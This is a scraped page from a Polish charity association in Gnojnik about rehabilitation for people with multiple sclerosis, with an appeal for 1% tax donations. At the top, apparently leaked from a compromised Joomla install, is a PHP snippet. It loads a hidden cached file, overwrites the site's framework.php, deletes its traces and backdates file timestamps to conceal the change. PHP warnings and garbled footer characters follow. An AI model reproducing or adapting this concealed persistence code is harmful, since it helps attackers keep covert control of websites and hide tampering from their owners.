$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 426
Nową inicjatywą Stowarzyszenia jest pomoc w rehabilitacji osób chorych na STWARDNIENIE ROZSIANE
 

Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395

Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 372
Nową inicjatywą Stowarzyszenia jest pomoc w rehabilitacji osób chorych na STWARDNIENIE ROZSIANE

Stwardnienie rozsiane jest przewlekłą, postępującą chorobą, w wyniku której dochodzi do procesów degeneracyjnych w obrębie ośrodkowego układu nerwowego. W efekcie tego procesu pojawiają się zaburzenia w przekazywaniu informacji, co z kolei jest przyczyną objawów neurologicznych. W związku z faktem, iż ogniska demielinizacji są rozproszone oraz pojawiają się w mózgowiu i rdzeniu przedłużonym w różnym czasie, często używa się określenia, że SR jest rozsiane w czasie i przestrzeni”. Choroba może przebiegać w różnorodny sposób. Przebieg łagodny(tzw. nawracająco-postępujący-, 85% pacjentów)charakteryzuje się małą liczbą rzutów w ciągu całego życia pacjenta, nie doprowadza do znacznego ograniczenia sprawności. Z biegiem czasu jednak może zmienić się w typ powoli postępujący, nazywany również wtórnie postępującym. Często spotyka się przypadki pierwotnie postępującego stwardnienia rozsianego- 15% pacjentów prowadzącego w krótkim okresie czasu do znacznego ograniczenia sprawności .Coraz częściej chorują młodzi ludzie , w pełni aktywności zawodowej , a nawet nastolatkowie.

Ponieważ  na Stwardnienie Rozsiane choruje coraz więcej osób chcemy i tej grupie społecznej zaproponować pomoc. Stowarzyszenie od lat współpracuje z Ośrodkiem Rehabilitacji w Gnojniku ,gdzie rehabilitowane są osoby poszkodowane w wypadkach komunikacyjnych .Ośrodek Rehabilitacyjno-Wypoczynkowy EWA w Gnojniku dysponuje bardzo dobrze wyposażoną bazę zabiegową i  posiada warunki lokalowe służące specjalistycznej rehabilitacji  osób chorych na Stwardnienie Rozsiane. /www.nzozgnojnik.pl/

W ORW”  EWA „ pacjenci z SM poddawani są specjalistycznej rehabilitacji , zgodnie z opracowanym programem dostosowanym do stopnia zaawansowania  choroby.

Działa również grupa wsparcia chorych na Stwardnienie Rozsiane.

Rehabilitacja chorych na Stwardnienie Rozsiane odbywa się

1/ w warunkach ambulatoryjnych,

2/ w ramach  Oddziału Pobytu Dziennego,

3/ rehabilitacji w warunkach domowych

 4/rehabilitacja stacjonarna –turnusy rehabilitacyjne pełnopłatne lub dofinansowane z PFRON lub przez  różne fundacje pomagające chorym na SM

Osobom chorym na SM proponujemy rehabilitację stacjonarną – zabiegi  w ramach Oddziału Pobytu Dziennego kontrakt z NFZ– zakwaterowanie w OWR” EWA” .

Pomagamy  w pokryciu kosztów pobytów stacjonarnych , dofinansowując zakwaterowanie i wyżywienie. Na ten cel  zbieramy pieniądze od sponsorów i przede wszystkim z 1 % podatku dochodowego. Dlatego proponujemy rozpropagowanie tej akcji , celem pozyskania  kolejnych wpłat 1% podatku na rzecz

 Stowarzyszenia „Pomocna Dłoń” Gnojnik  Nr KRS 0000030427

 
Pomagaj razem z nami, moesz przekaza� swoj darowizne za po�rednictwem internetu
Pomoc ofiarom wypadkw komunikacyjnych
Projekty Aktywizujce
Zielone Ochronki
Spartakiady
Warsztaty Terapi Zajciowej w Zawadzie Uszewskiej
 

Copyright © Stowarzyszenie "Pomocna Do"